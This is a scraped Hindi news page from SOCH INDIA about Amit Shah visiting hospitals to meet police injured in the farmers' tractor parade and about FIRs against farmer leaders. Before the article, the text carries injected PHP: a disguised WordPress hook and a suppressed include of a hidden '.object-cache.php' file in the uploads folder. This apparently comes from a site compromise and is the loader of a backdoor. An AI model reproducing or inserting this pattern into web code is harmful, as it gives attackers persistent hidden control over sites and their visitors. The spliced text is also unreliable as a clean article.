add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); Farmers Protest Live Updates: गृह मंत्री अमित शाह ने किया ट्रॉमा सेंटर और तीरथ राम अस्पताल का दौरा, घायल पुलिसकर्मियों से मिले – SOCH INDIA
Menu

देश
Farmers Protest Live Updates: गृह मंत्री अमित शाह ने किया ट्रॉमा सेंटर और तीरथ राम अस्पताल का दौरा, घायल पुलिसकर्मियों से मिले

nobanner

किसानों की ट्रैक्टर परेड के दौरान हिंसा की घटनाओं में करीब 400 पुलिसकर्मी घायल हो गए थे. किसान नवंबर से ही केंद्र के तीन कृषि कानूनों के खिलाफ दिल्ली की अलग-अलग सीमाओं पर प्रदर्शन कर रहे हैं. आज गृह मंत्री अमित शाह ने टॉमा सेंटर के बाद तीरथ राम अस्पताल का दौरा भी किया और घायल पुलिसकर्मियों का हाल जाना.

दिल्ली पुलिस ने ट्रैक्टर रैली में हुई हिंसा के मामले में अबतक 37 किसान नेताओं के खिलाफ केस दर्ज किया है. पुलिस ने किसान नेता दर्शन सिंह को नोटिस भेजकर तीन दिनों के अंदर जवाब मांगा है. साथ ही एफआईआर में पंजाबी एक्टर दीप सिंधू और लक्खा सिधाना का नाम भी जोड़ा गया है. दीप सिंधू ने ही लाल किले पर खालसा पंत का झंडा फहराया था. वहीं बताया जा रहा है कि गाजीपुर बॉर्डर पर कल रात से बिजली नहीं है. जिसके बाद वहां पुलिस की पहरेदारी बढ़ गई है.